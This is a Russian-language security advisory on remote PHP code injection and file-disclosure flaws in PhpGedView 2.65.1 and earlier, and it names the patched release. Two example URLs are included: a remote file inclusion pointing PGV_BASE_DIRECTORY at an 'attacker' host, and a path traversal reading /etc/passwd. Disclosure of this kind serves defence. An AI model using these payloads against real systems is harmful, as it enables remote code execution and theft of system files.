| Дата публикации: | 01.02.2004 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 1151 |
| Опасность: | Высокая |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | PhpGedView 2.x |
| Уязвимые версии: PhpGedView 2.65.1 и более ранние версии
Описание: Несколько уязвимостей обнаружено в PhpGedView. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целеовой системы. Удаленный авторизованный пользователь с ”admin“ привилегиями может просматривать произвольные файлы на целевой системе. Несколько сценариев (заканчивающихся '_conf.php') не проверяют данные, представленные пользователем в переменной $PGV_BASE_DIRECTORY. Пример: http://[target]/[phpGedView-directory ]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/Удаленный авторизованный пользователь с ”admin“ привилегиями может просматривать произвольные файлы на целевой системе. Пример: http://[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_config=../../../../../../etc/passwd URL производителя: http://phpgedview.sourceforge.net/ Решение:Установите обновленную версию программы: http://sourceforge.net/project/showfiles.php?group_id=55456&package_id=61562&release_id=141517 |
|
| Ссылки: | PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior |